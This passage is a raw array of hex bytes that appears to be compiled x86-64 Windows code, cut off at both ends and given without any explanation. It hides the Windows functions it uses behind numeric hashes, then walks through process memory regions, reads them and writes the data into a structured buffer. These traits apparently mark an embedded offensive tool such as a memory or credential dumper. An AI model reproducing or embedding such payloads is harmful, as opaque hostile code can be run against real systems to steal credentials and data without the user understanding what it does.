00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x08,0x00,0x00,0x00,0x00,0xC7,0x85,0x3C,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x48,0x8B,0x45,0xA0,0x48,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x08,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xA8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xAC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xB0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xB4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xB8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xBC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xC0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xC4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xC8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xCC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xD0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xD4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xD8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xDC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xE0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xE4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xE8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xEC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xF0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xF4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xF8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x48,0x8B,0x45,0x00,0x48,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x08,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x48,0x8B,0x45,0x08,0x48,0x89,0x02,0x48,0x8D,0x55,0x20,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB8,0x6C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x55,0xF2,0xFF,0xFF,0x85,0xC0,0x75,0x26,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x08,0x92,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x7A,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8B,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0x48,0x83,0xBD,0x48,0x01,0x00,0x00,0x00,0x0F,0x85,0x56,0xFC,0xFF,0xFF,0x8B,0x85,0x9C,0x00,0x00,0x00,0x6B,0xC0,0x6C,0x83,0xC0,0x04,0x89,0x45,0x1C,0x48,0x8D,0x55,0x1C,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x30,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x93,0xF1,0xFF,0xFF,0x48,0x8D,0x95,0x98,0x00,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x34,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x6F,0xF1,0xFF,0xFF,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0x48,0x81,0xC4,0xD8,0x01,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x8B,0x45,0x18,0x48,0x89,0x45,0xF8,0xEB,0x40,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x08,0x48,0x8B,0x55,0x10,0x48,0x39,0xC2,0x72,0x24,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x08,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x10,0x89,0xC0,0x48,0x01,0xD0,0x48,0x8B,0x55,0x10,0x48,0x39,0xC2,0x73,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x17,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0xB9,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xA0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x90,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x00,0x4C,0x8D,0x45,0x90,0x8B,0x4D,0xDC,0x48,0x8B,0x55,0xF0,0x48,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x30,0x00,0x00,0x00,0x4D,0x89,0xC1,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x80,0xD9,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x88,0x81,0x01,0x00,0x00,0x48,0x8B,0x45,0x90,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xA8,0x48,0x89,0x45,0xC8,0x48,0x8B,0x55,0xD0,0x48,0x8B,0x45,0xC8,0x48,0x01,0xC2,0x48,0x8B,0x45,0xD0,0x48,0x39,0xC2,0x0F,0x82,0x5C,0x01,0x00,0x00,0x48,0x8B,0x55,0xD0,0x48,0x8B,0x45,0xC8,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x8B,0x45,0xB0,0x3D,0x00,0x10,0x00,0x00,0x0F,0x85,0x18,0x01,0x00,0x00,0x8B,0x45,0xB8,0x3D,0x00,0x00,0x04,0x00,0x0F,0x84,0x10,0x01,0x00,0x00,0x8B,0x45,0xB4,0x83,0xE0,0x01,0x85,0xC0,0x0F,0x85,0x08,0x01,0x00,0x00,0x8B,0x45,0xB4,0x25,0x00,0x01,0x00,0x00,0x85,0xC0,0x0F,0x85,0xFE,0x00,0x00,0x00,0x8B,0x45,0xB4,0x83,0xE0,0x10,0x85,0xC0,0x0F,0x85,0xF6,0x00,0x00,0x00,0x8B,0x45,0xB8,0x3D,0x00,0x00,0x00,0x01,0x75,0x18,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0xD0,0x48,0x89,0xC1,0xE8,0x7B,0xFE,0xFF,0xFF,0x85,0xC0,0x0F,0x84,0xDA,0x00,0x00,0x00,0x48,0x8B,0x05,0xE2,0xB8,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x28,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD3,0xB8,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xC0,0x48,0x83,0x7D,0xC0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC1,0x00,0x00,0x00,0x48,0x8B,0x45,0xC0,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x55,0xD0,0x48,0x8B,0x45,0xC0,0x48,0x89,0x50,0x08,0x48,0x8B,0x45,0xC0,0x48,0x8B,0x55,0xC8,0x48,0x89,0x50,0x10,0x8B,0x55,0xB0,0x48,0x8B,0x45,0xC0,0x89,0x50,0x18,0x8B,0x55,0xB4,0x48,0x8B,0x45,0xC0,0x89,0x50,0x1C,0x8B,0x55,0xB8,0x48,0x8B,0x45,0xC0,0x89,0x50,0x20,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0x48,0x8B,0x45,0xC0,0x48,0x89,0x45,0xF8,0xEB,0x2C,0x48,0x8B,0x45,0xF8,0x48,0x89,0x45,0xE0,0xEB,0x0B,0x48,0x8B,0x45,0xE0,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x8B,0x00,0x48,0x85,0xC0,0x75,0xE9,0x48,0x8B,0x45,0xE0,0x48,0x8B,0x55,0xC0,0x48,0x89,0x10,0x83,0x45,0xEC,0x01,0xE9,0x64,0xFE,0xFF,0xFF,0x90,0xE9,0x5E,0xFE,0xFF,0xFF,0x90,0xE9,0x58,0xFE,0xFF,0xFF,0x90,0xE9,0x52,0xFE,0xFF,0xFF,0x90,0xE9,0x4C,0xFE,0xFF,0xFF,0x90,0xE9,0x46,0xFE,0xFF,0xFF,0x90,0xE9,0x40,0xFE,0xFF,0xFF,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF8,0x48,0x81,0xC4,0xA0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x78,0x48,0x8D,0x6C,0x24,0x70,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x48,0x8B,0x45,0x20,0x8B,0x40,0x10,0x89,0x45,0xE0,0x48,0x8B,0x55,0x28,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0xE8,0xB3,0xFD,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x76,0x03,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xF8,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xEB,0x17,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC0,0x01,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0xE2,0x48,0x8D,0x55,0xD8,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x93,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x49,0x8E,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x09,0x03,0x00,0x00,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC0,0x01,0x48,0xC1,0xE0,0x04,0xBA,0xFF,0xFF,0xFF,0xFF,0x48,0x39,0xC2,0x73,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x10,0x8E,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xD0,0x02,0x00,0x00,0x48,0x8B,0x45,0xD8,0x83,0xC0,0x01,0xC1,0xE0,0x04,0x89,0x45,0xD4,0x8B,0x45,0xE0,0x89,0xC2,0x8B,0x45,0xD4,0x89,0xC0,0x48,0x01,0xD0,0x48,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC8,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFF,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB5,0x8D,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x75,0x02,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xF8,0xE9,0x8D,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8D,0x50,0x08,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB1,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x67,0x8D,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x27,0x02,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8D,0x50,0x10,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x70,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x26,0x8D,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xE6,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x0F,0x85,0x68,0xFF,0xFF,0xFF,0x48,0x8D,0x55,0xD4,0x48,0x8B,0x45,0x20,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x3C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCC,0xEC,0xFF,0xFF,0x48,0x8D,0x55,0xE0,0x48,0x8B,0x45,0x20,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x40,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAE,0xEC,0xFF,0xFF,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xF8,0xE9,0x78,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x58,0x10,0x48,0x8B,0x05,0xAA,0xB5,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x9E,0xB5,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x4D,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x48,0x10,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x08,0x49,0x89,0xC2,0x48,0x8B,0x45,0x20,0x48,0x8B,0x00,0x48,0x8B,0x55,0xE8,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0x4C,0x89,0xD2,0x48,0x89,0xC1,0xE8,0xCE,0xD3,0xFF,0xFF,0x89,0x45,0xE4,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x10,0xBA,0xFF,0xFF,0xFF,0xFF,0x48,0x39,0xC2,0x73,0x0D,0x48,0x8B,0x45,0xF8,0xBB,0xFF,0xFF,0xFF,0xFF,0x48,0x89,0x58,0x10,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x10,0x89,0xC1,0x48,0x8B,0x55,0xE8,0x48,0x8B,0x45,0x20,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x39,0xEC,0xFF,0xFF,0x85,0xC0,0x75,0x6C,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEF,0x8B,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xE8,0x00,0x74,0x45,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x10,0x48,0x8B,0x45,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x50,0x23,0x00,0x00,0x48,0x8B,0x05,0xC1,0xB4,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xB9,0xB4,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x66,0x48,0x83,0x7D,0xE8,0x00,0x74,0x45,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x10,0x48,0x8B,0x45,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFD,0x22,0x00,0x00,0x48,0x8B,0x05,0x6E,0xB4,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x66,0xB4,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x0F,0x85,0x7D,0xFE,0xFF,0xFF,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x78,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xC7,0xEB,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC4,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x98,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAA,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x7F,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x90,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xEC,0xF1,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x72,0x48,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xB9,0xFB,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x20,0x48,0x8B,0x45,0xF8,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x83,0x8A,0xFF,0xFF,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x37,0x48,0x8B,0x45,0xF8,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x63,0x8A,0xFF,0xFF,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4A,0x8A,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x9A,0x47,0x00,0x00,0x48,0x89,0xC1,0xE8,0x97,0x96,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xEF,0xA2,0x08,0x9E,0x48,0x89,0xC1,0xE8,0xA5,0x94,0xFF,0xFF,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xD8,0x00,0x0F,0x84,0xC1,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x64,0x47,0x00,0x00,0x48,0x89,0xC1,0xE8,0x61,0x96,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xDC,0x72,0x80,0x5A,0x48,0x89,0xC1,0xE8,0x6F,0x94,0xFF,0xFF,0x48,0x89,0x45,0xD0,0x48,0x83,0x7D,0xD0,0x00,0x0F,0x84,0x8E,0x00,0x00,0x00,0x48,0x8B,0x05,0x8B,0xB2,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x0A,0x02,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x7C,0xB2,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x74,0x66,0x48,0x8B,0x55,0x10,0x48,0x8B,0x45,0xE8,0x49,0x89,0xD1,0x4C,0x8D,0x05,0x17,0x47,0x00,0x00,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x18,0x21,0x00,0x00,0x48,0x8B,0x55,0xE8,0x48,0x8B,0x45,0xD8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0xB9,0x02,0x00,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x28,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x55,0xD0,0x48,0x89,0xC1,0xFF,0xD2,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x74,0x15,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xC5,0xD0,0xFF,0xFF,0x48,0x83,0x7D,0xE8,0x00,0x74,0x21,0x48,0x8B,0x05,0xD9,0xB1,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD1,0xB1,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xC0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0x66,0x0F,0xD6,0x45,0xC0,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x80,0x66,0x0F,0xD6,0x45,0x90,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xFD,0x45,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCA,0x94,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x1D,0x21,0x88,0x03,0x48,0x89,0xC1,0xE8,0xD8,0x92,0xFF,0xFF,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x84,0x01,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xC7,0x45,0x00,0x00,0x48,0x89,0xC1,0xE8,0x94,0x94,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x86,0xE8,0x93,0x16,0x48,0x89,0xC1,0xE8,0xA2,0x92,0xFF,0xFF,0x48,0x89,0x45,0xD0,0x48,0x83,0x7D,0xD0,0x00,0x0F,0x84,0x51,0x01,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xAB,0x45,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5E,0x94,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x44,0x3B,0x99,0x58,0x48,0x89,0xC1,0xE8,0x6C,0x92,0xFF,0xFF,0x48,0x89,0x45,0xC8,0x48,0x83,0x7D,0xC8,0x00,0x0F,0x84,0x1E,0x01,0x00,0x00,0x48,0x8B,0x05,0x88,0xB0,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x0A,0x02,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x79,0xB0,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xF2,0x00,0x00,0x00,0x48,0